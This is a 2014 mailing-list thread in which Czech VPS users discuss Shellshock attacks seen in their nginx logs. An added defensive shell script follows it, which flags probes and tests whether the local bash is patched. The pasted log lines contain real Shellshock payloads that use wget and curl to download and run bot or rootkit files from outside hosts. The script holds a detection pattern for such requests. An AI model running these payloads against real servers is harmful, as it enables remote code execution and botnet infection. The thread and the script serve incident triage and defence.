[vpsFree.cz: community-list] Re: Attacks on bash are underway

Petr Vanek petr at yarpen.cz
Mon Sep 29 10:38:41 CEST 2014


On 09/29/2014 10:33 AM, Jiří Medvěd wrote:
> So I looked into it, and this one is fairly harmless; it seems to be only a
> test of whether that bash is vulnerable, but it actually does nothing.
>
> 74.201.85.69/ec.z -> is just the nginx welcome page.

Now it is. But a few days ago it was some Perl IRC bot.


>
> Mainly, upgrade that bash :)
>
> Medved
>
> On 29.9.2014 at 10:23, René Klačan wrote:
> > I have the following in my logs
>
> > root at yuna /home/rene # grep '() {' /var/log/nginx/*
> > /var/log/nginx/access.log:70.42.149.67 - - [28/Sep/2014:08:18:37
> > +0200] "GET /test HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c
> > \x22wget -O /var/tmp/ec.z http://74.201.85.69/ec.z;chmod +x
> > /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z\x22"
> > /var/log/nginx/access.log:70.42.149.67 - - [28/Sep/2014:08:18:37
> > +0200] "GET / HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c
> > \x22wget -O /var/tmp/ec.z http://74.201.85.69/ec.z;chmod +x
> > /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z\x22"
> > /var/log/nginx/access.log:70.42.149.67 - - [28/Sep/2014:08:18:37
> > +0200] "GET /cgi-bin/test.sh HTTP/1.0" 200 193 "-" "() { :;};
> > /bin/bash -c \x22wget -O /var/tmp/ec.z http://74.201.85.69/ec.z;chmod
> > +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z\x22"
> > /var/log/nginx/access.log.1:209.126.230.72 - -
> > [25/Sep/2014:07:26:09 +0200] "GET / HTTP/1.0" 200 193 "() { :; };
> > ping -c 11 209.126.230.74" "shellshock-scan
> > (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
> > /var/log/nginx/access.log.1:89.207.135.125 - - [25/Sep/2014:11:26:32
> > +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 200 193 "-" "() {
> > :;}; /bin/ping -c 1 198.101.206.138"
> > /var/log/nginx/access.log.1:54.251.83.67 - - [27/Sep/2014:21:35:34
> > +0200] "GET / HTTP/1.1" 200 193 "-" "() { :;}; /bin/bash -c
> > \x22echo testing9123123\x22; /bin/uname -a"
> > /var/log/nginx/access.log.1:137.189.52.234 - -
> > [27/Sep/2014:23:18:23 +0200] "GET /cgi-bin/test-cgi HTTP/1.0" 200
> > 193 "-" "() { :;}; /bin/bash -c \x22wget
> > http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh
> > http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf
> > /tmp/sh\x22"
>
> > it looks a bit bad :-/ ... what do you recommend doing about it? just
> > kill the suspicious processes? and look for traces of whether they
> > start up again after a reboot?
>
>
> > 2014-09-29 10:10 GMT+02:00 Michal Miklos <mimik at mimik.sk
> > <mailto:mimik at mimik.sk>>:
>
> > the only thing is to check whether you have a good version of bash.
>
>
> > On 29 Sep 2014, at 10:08, Jan B. Kolář
> > <janbivoj.kolar at zazen-nudu.cz
> > <mailto:janbivoj.kolar at zazen-nudu.cz>> wrote:
>
> >> Hi,
> >>
> >> maybe a silly question - is there any way to tell from the log whether
> >> the intrusion was successful or not?
> >>
> >> Honza
> >>
> >> On 29.9.2014 10:02, Petr Krcmar wrote:
> >>> On 29.9.2014 at 09:57, Jiří Medvěd wrote:
> >>>> Hey,
> >>>>
> >>>> from another machine:
> >>> Yes, I found that too. Apparently someone is trying to push a
> >>> rootkit there:
> >>>
> >>> http://petrkrcmar.blog.root.cz/2014/09/29/utoky-na-bash-uz-bezi/
>
> >> _______________________________________________
> >> Community-list mailing list
> >> Community-list at lists.vpsfree.cz
> >> http://lists.vpsfree.cz/listinfo/community-list


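Two practical questions in this thread, René's (what to do with a box whose logs show these requests) and Jan's (can the log alone tell whether an attempt succeeded), map onto a small triage script. The following is an added example, not code from anyone in the thread or from vpsFree. The log lines inside it are constructed in the format of the ones René pasted (addresses, paths and timestamps are invented placeholders), and the names `SAMPLE_LOG`, `shellshock_lines`, `shellshock_count`, `shellshock_paths` and `bash_is_vulnerable` are this example's own. It pulls out every request whose Referer or User-Agent carries the `() {` function-definition prefix that Shellshock probes use, lists the paths those requests hit so you can check which of them are actually wired to a CGI handler (nginx never hands a request to bash by itself; only a CGI or FastCGI wrapper does, which is why a `200` on `/cgi-bin/test.sh` proves nothing on its own), and runs the widely published environment-variable test against the local bash.

```shell
#!/bin/sh
# Added example: triage helpers for Shellshock probes in nginx access logs.
# Not code from the thread. Sample log lines below are constructed; the
# addresses, paths and timestamps are placeholders in the pasted format.
SAMPLE_LOG='10.0.0.1 - - [28/Sep/2014:08:18:37 +0200] "GET /test HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c \x22echo testing\x22; /bin/uname -a"
10.0.0.2 - - [28/Sep/2014:09:00:00 +0200] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"
10.0.0.3 - - [25/Sep/2014:07:26:09 +0200] "GET /cgi-bin/test-cgi HTTP/1.0" 404 162 "() { :; }; ping -c 1 10.0.0.9" "shellshock-scan"
10.0.0.4 - - [29/Sep/2014:10:00:00 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 200 193 "-" "() { :;}; /bin/ping -c 1 10.0.0.9"'

# Print the log lines whose Referer or User-Agent field carries the
# "() {" prefix. grep -F treats the pattern literally; "|| true" keeps a
# clean log (no matches) from being reported as an error.
shellshock_lines() {
    printf '%s\n' "$1" | grep -F '() {' || true
}

# Number of such lines (0 when there are none).
shellshock_count() {
    shellshock_lines "$1" | grep -c . || true
}

# Distinct request paths hit by those lines. The request is the first
# double-quoted field; the \x22 escapes in the User-Agent are literal
# backslash sequences, not quote characters, so the split is stable.
shellshock_paths() {
    shellshock_lines "$1" | awk -F'"' '{ split($2, r, " "); print r[2] }' | LC_ALL=C sort -u
}

# Exit 0 if the local bash still runs code appended to a function
# definition imported from the environment (the original Shellshock test),
# 1 if it is patched, 2 if bash is not installed at all.
bash_is_vulnerable() {
    command -v bash >/dev/null 2>&1 || return 2
    out=$(env x='() { :;}; echo vulnerable' bash -c 'echo test' 2>/dev/null)
    case "$out" in
        *vulnerable*) return 0 ;;
        *) return 1 ;;
    esac
}

# Stand-alone run: matches, the paths they hit, and the local bash status.
printf 'Shellshock-style requests: %s\n' "$(shellshock_count "$SAMPLE_LOG")"
shellshock_paths "$SAMPLE_LOG"
if bash_is_vulnerable; then
    echo "local bash: VULNERABLE, upgrade it"
else
    echo "local bash: patched or not installed"
fi
```

Replace `SAMPLE_LOG` with `$(cat /var/log/nginx/access.log)` to run it on a real log. An exit status of 0 from `bash_is_vulnerable` means the package René was told to upgrade is still unpatched. A patched bash and a path list with no CGI-backed entries is the best answer the access log can give to Jan's question; it does not prove nothing ran earlier, and since the payloads in the thread remove their own files from `/var/tmp`, any remaining evidence is in the process list, cron and init entries, and outbound connections, which is what René's "kill it and look for what restarts" amounts to.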